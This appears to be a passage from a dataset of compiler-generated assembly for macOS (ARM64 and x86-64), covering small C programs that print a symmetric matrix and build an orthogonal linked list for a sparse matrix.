tbnz w8, #0, LBB0_23
b LBB0_22
LBB0_22:
bl ___stack_chk_fail
LBB0_23:
mov w0, #0
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz " "
l_.str.2: ; @.str.2
.asciz "%3d"
l_.str.3: ; @.str.3
.asciz "\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -12(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
## Child Loop BB0_5 Depth 3
## Child Loop BB0_11 Depth 2
## Child Loop BB0_13 Depth 3
leaq L_.str(%rip), %rdi
leaq -16(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $0, -16(%rbp)
je LBB0_21
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -16(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -80(%rbp) ## 8-byte Spill
movq %rax, %rcx
movq %rcx, -72(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -32(%rbp)
imulq %rax, %rax
shlq $2, %rax
callq ____chkstk_darwin
movq -80(%rbp), %rcx ## 8-byte Reload
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -72(%rbp), %rax ## 8-byte Reload
movq %rsp, %rdx
movq %rdx, -64(%rbp) ## 8-byte Spill
movq %rcx, -40(%rbp)
movq %rax, -48(%rbp)
movl $0, -20(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_5 Depth 3
movl -20(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_10
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movl $1, -52(%rbp)
movl -20(%rbp), %eax
movl %eax, -24(%rbp)
LBB0_5: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -24(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=3
movq -64(%rbp), %rax ## 8-byte Reload
movq -72(%rbp), %rsi ## 8-byte Reload
movl -52(%rbp), %edi
movslq -20(%rbp), %rdx
imulq %rsi, %rdx
shlq $2, %rdx
movq %rax, %rcx
addq %rdx, %rcx
movslq -24(%rbp), %rdx
movl %edi, (%rcx,%rdx,4)
movl -52(%rbp), %edx
movslq -24(%rbp), %rcx
imulq %rsi, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -20(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
## %bb.7: ## in Loop: Header=BB0_5 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_5
LBB0_8: ## in Loop: Header=BB0_3 Depth=2
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_3 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_3
LBB0_10: ## in Loop: Header=BB0_1 Depth=1
movl $0, -20(%rbp)
LBB0_11: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_13 Depth 3
movl -20(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_20
## %bb.12: ## in Loop: Header=BB0_11 Depth=2
movl $0, -24(%rbp)
LBB0_13: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_11 Depth=2
## => This Inner Loop Header: Depth=3
movl -24(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_18
## %bb.14: ## in Loop: Header=BB0_13 Depth=3
cmpl $0, -24(%rbp)
je LBB0_16
## %bb.15: ## in Loop: Header=BB0_13 Depth=3
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_16: ## in Loop: Header=BB0_13 Depth=3
movq -64(%rbp), %rax ## 8-byte Reload
movq -72(%rbp), %rdx ## 8-byte Reload
movslq -20(%rbp), %rcx
imulq %rdx, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
## %bb.17: ## in Loop: Header=BB0_13 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_13
LBB0_18: ## in Loop: Header=BB0_11 Depth=2
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
## %bb.19: ## in Loop: Header=BB0_11 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_11
LBB0_20: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -32(%rbp), %rax
movq %rax, %rsp
jmp LBB0_1
LBB0_21:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_23
## %bb.22:
xorl %eax, %eax
movq %rbp, %rsp
popq %rbp
retq
LBB0_23:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz " "
L_.str.2: ## @.str.2
.asciz "%3d"
L_.str.3: ## @.str.3
.asciz "\n"
.subsections_via_symbols
| the_stack_data/67325689.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _initCrossList ; -- Begin function initCrossList
.p2align 2
_initCrossList: ; @initCrossList
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #24]
ldr x8, [sp, #8]
str xzr, [x8, #16]
ldr x8, [sp, #8]
str wzr, [x8, #8]
ldr x8, [sp, #8]
str wzr, [x8]
ldr x8, [sp, #8]
str wzr, [x8, #4]
mov w0, #1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _createCrossList ; -- Begin function createCrossList
.p2align 2
_createCrossList: ; @createCrossList
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #36
str x8, [x9]
sub x8, x29, #40
str x8, [x9, #8]
sub x8, x29, #44
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-36]
ldur x9, [x29, #-8]
str w8, [x9]
ldur w8, [x29, #-40]
ldur x9, [x29, #-8]
str w8, [x9, #4]
ldur w8, [x29, #-44]
ldur x9, [x29, #-8]
str w8, [x9, #8]
ldur w8, [x29, #-36]
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #3
bl _malloc
ldr w8, [sp, #44] ; 4-byte Folded Reload
ldur x9, [x29, #-8]
str x0, [x9, #16]
str w8, [sp, #52]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
ldur w9, [x29, #-36]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-8]
ldr x9, [x8, #16]
ldrsw x10, [sp, #52]
mov x8, #0
str x8, [x9, x10, lsl #3]
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB1_1
LBB1_4:
ldur w8, [x29, #-40]
mov w9, #1
str w9, [sp, #40] ; 4-byte Folded Spill
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #3
bl _malloc
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldur x9, [x29, #-8]
str x0, [x9, #24]
str w8, [sp, #52]
b LBB1_5
LBB1_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
ldur w9, [x29, #-40]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_8
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_5 Depth=1
ldur x8, [x29, #-8]
ldr x9, [x8, #24]
ldrsw x10, [sp, #52]
mov x8, #0
str x8, [x9, x10, lsl #3]
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_5 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB1_5
LBB1_8:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
str wzr, [sp, #52]
b LBB1_9
LBB1_9: ; =>This Loop Header: Depth=1
; Child Loop BB1_11 Depth 2
; Child Loop BB1_13 Depth 3
; Child Loop BB1_27 Depth 2
; Child Loop BB1_36 Depth 2
ldr w8, [sp, #52]
ldur w9, [x29, #-44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_43
b LBB1_10
LBB1_10: ; in Loop: Header=BB1_9 Depth=1
mov x9, sp
sub x8, x29, #48
str x8, [x9]
sub x8, x29, #52
str x8, [x9, #8]
add x8, sp, #56
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
mov w8, #1
str w8, [sp, #48]
b LBB1_11
LBB1_11: ; Parent Loop BB1_9 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB1_13 Depth 3
ldr w8, [sp, #48]
ldur w9, [x29, #-36]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_20
b LBB1_12
LBB1_12: ; in Loop: Header=BB1_11 Depth=2
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldrsw x9, [sp, #48]
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-32]
b LBB1_13
LBB1_13: ; Parent Loop BB1_9 Depth=1
; Parent Loop BB1_11 Depth=2
; => This Inner Loop Header: Depth=3
ldur x8, [x29, #-32]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_18
b LBB1_14
LBB1_14: ; in Loop: Header=BB1_13 Depth=3
ldur x8, [x29, #-32]
ldr w8, [x8]
ldur w9, [x29, #-48]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_17
b LBB1_15
LBB1_15: ; in Loop: Header=BB1_13 Depth=3
ldur x8, [x29, #-32]
ldr w8, [x8, #4]
ldur w9, [x29, #-52]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_17
b LBB1_16
LBB1_16: ; in Loop: Header=BB1_11 Depth=2
b LBB1_18
LBB1_17: ; in Loop: Header=BB1_13 Depth=3
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
stur x8, [x29, #-32]
b LBB1_13
LBB1_18: ; in Loop: Header=BB1_11 Depth=2
b LBB1_19
LBB1_19: ; in Loop: Header=BB1_11 Depth=2
ldr w8, [sp, #48]
add w8, w8, #1
str w8, [sp, #48]
b LBB1_11
LBB1_20: ; in Loop: Header=BB1_9 Depth=1
ldur w8, [x29, #-48]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_22
b LBB1_21
LBB1_21: ; in Loop: Header=BB1_9 Depth=1
ldur w8, [x29, #-52]
ldur x9, [x29, #-8]
ldr w9, [x9, #4]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB1_23
b LBB1_22
LBB1_22:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _system
mov w0, #0
bl _exit
LBB1_23: ; in Loop: Header=BB1_9 Depth=1
mov x0, #32
bl _malloc
stur x0, [x29, #-16]
ldur w8, [x29, #-48]
ldur x9, [x29, #-16]
str w8, [x9]
ldur w8, [x29, #-52]
ldur x9, [x29, #-16]
str w8, [x9, #4]
ldr w8, [sp, #56]
ldur x9, [x29, #-16]
str w8, [x9, #8]
ldur x8, [x29, #-16]
; kill: def $x9 killed $xzr
str xzr, [x8, #16]
ldur x8, [x29, #-16]
str xzr, [x8, #24]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-48]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_25
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-48]
ldr x8, [x8, x9, lsl #3]
ldr w8, [x8, #4]
ldur w9, [x29, #-52]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB1_26
b LBB1_25
LBB1_25: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-48]
ldr x8, [x8, x9, lsl #3]
ldur x9, [x29, #-16]
str x8, [x9, #16]
ldur x8, [x29, #-16]
ldur x9, [x29, #-8]
ldr x9, [x9, #16]
ldursw x10, [x29, #-48]
str x8, [x9, x10, lsl #3]
b LBB1_32
LBB1_26: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-48]
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-24]
b LBB1_27
LBB1_27: ; Parent Loop BB1_9 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #16]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_29
b LBB1_28
LBB1_28: ; in Loop: Header=BB1_27 Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #16]
ldr w8, [x8, #4]
ldur w9, [x29, #-52]
subs w8, w8, w9
cset w8, lt
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB1_29
LBB1_29: ; in Loop: Header=BB1_27 Depth=2
ldr w8, [sp, #36] ; 4-byte Folded Reload
tbz w8, #0, LBB1_31
b LBB1_30
LBB1_30: ; in Loop: Header=BB1_27 Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #16]
stur x8, [x29, #-24]
b LBB1_27
LBB1_31: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #16]
ldur x9, [x29, #-16]
str x8, [x9, #16]
ldur x8, [x29, #-16]
ldur x9, [x29, #-24]
str x8, [x9, #16]
b LBB1_32
LBB1_32: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-52]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_34
b LBB1_33
LBB1_33: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-52]
ldr x8, [x8, x9, lsl #3]
ldr w8, [x8]
ldur w9, [x29, #-48]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB1_35
b LBB1_34
LBB1_34: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-52]
ldr x8, [x8, x9, lsl #3]
ldur x9, [x29, #-16]
str x8, [x9, #24]
ldur x8, [x29, #-16]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
ldursw x10, [x29, #-52]
str x8, [x9, x10, lsl #3]
b LBB1_41
LBB1_35: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-52]
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-24]
b LBB1_36
LBB1_36: ; Parent Loop BB1_9 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #24]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_38
b LBB1_37
LBB1_37: ; in Loop: Header=BB1_36 Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #24]
ldr w8, [x8]
ldur w9, [x29, #-48]
subs w8, w8, w9
cset w8, lt
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB1_38
LBB1_38: ; in Loop: Header=BB1_36 Depth=2
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB1_40
b LBB1_39
LBB1_39: ; in Loop: Header=BB1_36 Depth=2
ldur x8, [x29, #-24]
ldr x8, [x8, #24]
stur x8, [x29, #-24]
b LBB1_36
LBB1_40: ; in Loop: Header=BB1_9 Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #24]
ldur x9, [x29, #-16]
str x8, [x9, #24]
ldur x8, [x29, #-16]
ldur x9, [x29, #-24]
str x8, [x9, #24]
b LBB1_41
LBB1_41: ; in Loop: Header=BB1_9 Depth=1
b LBB1_42
LBB1_42: ; in Loop: Header=BB1_9 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB1_9
LBB1_43:
mov w0, #1
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.globl _print_list ; -- Begin function print_list
.p2align 2
_print_list: ; @print_list
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-12]
b LBB2_1
LBB2_1: ; =>This Loop Header: Depth=1
; Child Loop BB2_3 Depth 2
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB2_12
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-12]
ldr x8, [x8, x9, lsl #3]
str x8, [sp, #8]
mov w8, #1
str w8, [sp, #16]
b LBB2_3
LBB2_3: ; Parent Loop BB2_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldr w9, [x9, #4]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB2_10
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_3 Depth=2
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_7
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_3 Depth=2
ldr x8, [sp, #8]
ldr w8, [x8, #4]
ldr w9, [sp, #16]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_7
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_3 Depth=2
ldr x8, [sp, #8]
ldr w9, [x8, #8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x8, [x8, #16]
str x8, [sp, #8]
b LBB2_8
LBB2_7: ; in Loop: Header=BB2_3 Depth=2
mov x8, sp
; kill: def $x9 killed $xzr
str xzr, [x8]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB2_8
LBB2_8: ; in Loop: Header=BB2_3 Depth=2
b LBB2_9
LBB2_9: ; in Loop: Header=BB2_3 Depth=2
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB2_3
LBB2_10: ; in Loop: Header=BB2_1 Depth=1
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
b LBB2_11
LBB2_11: ; in Loop: Header=BB2_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB2_1
LBB2_12:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _freopen
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
ldr x2, [x8]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _freopen
mov x0, #32
bl _malloc
str x0, [sp, #16]
ldr x0, [sp, #16]
bl _initCrossList
ldr x0, [sp, #16]
bl _createCrossList
ldr x0, [sp, #16]
bl _print_list
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\350\276\223\345\205\245\347\250\200\347\226\217\347\237\251\351\230\265\347\232\204\350\241\214\357\274\214\345\210\227\344\273\245\345\217\212\351\235\236\351\233\266\345\205\203\347\264\240\344\270\252\346\225\260\n"
l_.str.1: ; @.str.1
.asciz "%d%d%d"
l_.str.2: ; @.str.2
.asciz "\350\276\223\345\205\245\351\235\236\351\233\266\345\205\203\347\264\240\350\241\214\357\274\214\345\210\227\357\274\214\351\235\236\351\233\266\345\205\203\347\264\240\n"
l_.str.3: ; @.str.3
.asciz "\344\275\215\347\275\256\344\270\215\345\220\210\346\263\225! \346\227\240\346\263\225\345\256\214\346\210\220\346\223\215\344\275\234!\n"
l_.str.4: ; @.str.4
.asciz "pause"
l_.str.5: ; @.str.5
.asciz "\347\250\200\347\226\217\347\237\251\351\230\265\344\270\272\n"
l_.str.6: ; @.str.6
.asciz "%d\t"
l_.str.7: ; @.str.7
.asciz "\n"
l_.str.8: ; @.str.8
.asciz "input.txt"
l_.str.9: ; @.str.9
.asciz "r"
l_.str.10: ; @.str.10
.asciz "output.txt"
l_.str.11: ; @.str.11
.asciz "w"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _initCrossList ## -- Begin function initCrossList
.p2align 4, 0x90
_initCrossList: ## @initCrossList
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq $0, 24(%rax)
movq -8(%rbp), %rax
movq $0, 16(%rax)
movq -8(%rbp), %rax
movl $0, 8(%rax)
movq -8(%rbp), %rax
movl $0, (%rax)
movq -8(%rbp), %rax
movl $0, 4(%rax)
movl $1, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _createCrossList ## -- Begin function createCrossList
.p2align 4, 0x90
_createCrossList: ## @createCrossList
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq %rdi, -8(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -36(%rbp), %rsi
leaq -40(%rbp), %rdx
leaq -44(%rbp), %rcx
movb $0, %al
callq _scanf
movl -36(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
movl -40(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, 4(%rax)
movl -44(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, 8(%rax)
movl -36(%rbp), %eax
addl $1, %eax
movslq %eax, %rdi
shlq $3, %rdi
callq _malloc
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
movl $1, -60(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -60(%rbp), %eax
cmpl -36(%rbp), %eax
jg LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -60(%rbp), %rcx
movq $0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB1_1
LBB1_4:
movl -40(%rbp), %eax
addl $1, %eax
movslq %eax, %rdi
shlq $3, %rdi
callq _malloc
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, 24(%rax)
movl $1, -60(%rbp)
LBB1_5: ## =>This Inner Loop Header: Depth=1
movl -60(%rbp), %eax
cmpl -40(%rbp), %eax
jg LBB1_8
## %bb.6: ## in Loop: Header=BB1_5 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -60(%rbp), %rcx
movq $0, (%rax,%rcx,8)
## %bb.7: ## in Loop: Header=BB1_5 Depth=1
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB1_5
LBB1_8:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -60(%rbp)
LBB1_9: ## =>This Loop Header: Depth=1
## Child Loop BB1_11 Depth 2
## Child Loop BB1_13 Depth 3
## Child Loop BB1_27 Depth 2
## Child Loop BB1_36 Depth 2
movl -60(%rbp), %eax
cmpl -44(%rbp), %eax
jge LBB1_43
## %bb.10: ## in Loop: Header=BB1_9 Depth=1
leaq L_.str.1(%rip), %rdi
leaq -48(%rbp), %rsi
leaq -52(%rbp), %rdx
leaq -56(%rbp), %rcx
movb $0, %al
callq _scanf
movl $1, -64(%rbp)
LBB1_11: ## Parent Loop BB1_9 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB1_13 Depth 3
movl -64(%rbp), %eax
cmpl -36(%rbp), %eax
jg LBB1_20
## %bb.12: ## in Loop: Header=BB1_11 Depth=2
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -64(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -32(%rbp)
LBB1_13: ## Parent Loop BB1_9 Depth=1
## Parent Loop BB1_11 Depth=2
## => This Inner Loop Header: Depth=3
cmpq $0, -32(%rbp)
je LBB1_18
## %bb.14: ## in Loop: Header=BB1_13 Depth=3
movq -32(%rbp), %rax
movl (%rax), %eax
cmpl -48(%rbp), %eax
jne LBB1_17
## %bb.15: ## in Loop: Header=BB1_13 Depth=3
movq -32(%rbp), %rax
movl 4(%rax), %eax
cmpl -52(%rbp), %eax
jne LBB1_17
## %bb.16: ## in Loop: Header=BB1_11 Depth=2
jmp LBB1_18
LBB1_17: ## in Loop: Header=BB1_13 Depth=3
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB1_13
LBB1_18: ## in Loop: Header=BB1_11 Depth=2
jmp LBB1_19
LBB1_19: ## in Loop: Header=BB1_11 Depth=2
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
jmp LBB1_11
LBB1_20: ## in Loop: Header=BB1_9 Depth=1
movl -48(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jg LBB1_22
## %bb.21: ## in Loop: Header=BB1_9 Depth=1
movl -52(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 4(%rcx), %eax
jle LBB1_23
LBB1_22:
leaq L_.str.3(%rip), %rdi
xorl %eax, %eax
movl %eax, -68(%rbp) ## 4-byte Spill
callq _printf
leaq L_.str.4(%rip), %rdi
callq _system
movl -68(%rbp), %edi ## 4-byte Reload
callq _exit
LBB1_23: ## in Loop: Header=BB1_9 Depth=1
movl $32, %edi
callq _malloc
movq %rax, -16(%rbp)
movl -48(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movl -52(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, 4(%rax)
movl -56(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, 8(%rax)
movq -16(%rbp), %rax
movq $0, 16(%rax)
movq -16(%rbp), %rax
movq $0, 24(%rax)
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -48(%rbp), %rcx
cmpq $0, (%rax,%rcx,8)
